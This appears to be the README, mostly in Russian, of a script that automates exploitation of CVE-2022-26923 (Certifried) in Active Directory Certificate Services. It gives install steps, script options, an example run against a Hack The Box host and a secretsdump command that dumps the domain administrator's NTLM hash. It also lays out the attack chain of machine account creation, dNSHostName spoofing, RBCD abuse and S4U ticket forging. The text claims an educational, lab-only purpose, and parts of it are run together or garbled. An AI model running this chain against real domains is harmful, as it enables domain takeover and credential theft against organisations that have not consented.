
Exploitation de CVE-2022-26923
Автоматизация эксплуатации CVE-2022-26923 (Certifried), позволяющая повышение привилегий через злоупотребление службами Active Directory Certificate Services (AD CS) и Resource-Based Constrained Delegation (RBCD), приводящая к дампу NTLM-хэша учётной записи администратора домена.
⚠️ Только в образовательных целях / Lab / HTB
Не использовать в несанкционированных средах.
Этот скрипт автоматизирует следующую цепочку атаки:
dNSHostNameadministratorsecretsdump.pycertipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]
-d, --dc-ip IP-адрес Domain Controller
-D, --domain Имя домена
-u, --user Действительный пользователь
-p, --pass Пароль пользователя
-c, --comp-name Имя контролируемого компьютера
-C, --comp-pass Пароль компьютера
-a, --ca-name Имя Certificate Authority
-t, --template Шаблон сертификата
-f, --pfx-file Имя файла PFX
-H, --dc-hostname Имя хоста DC
-A, --dc-account Учётная запись DC
-i, --impersonate Целевая учётная запись для имперсонации
--verbose Режим отладки
-h, --help Справка
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
По завершении выполнения:
administrator.ccacheadministratorПри проблемах с Kerberos:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
Machine Account Creation
↓
dNSHostName spoofing
↓
Certificate Request (Machine Template)
↓
Authentication via PFX
↓
RBCD abuse (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
Kerberos Ticket extraction
↓
NTLM dump via secretsdump
Этот проект предоставляется в целях:
Автор снимает с себя всякую ответственность в случае несанкционированного использования.
MIT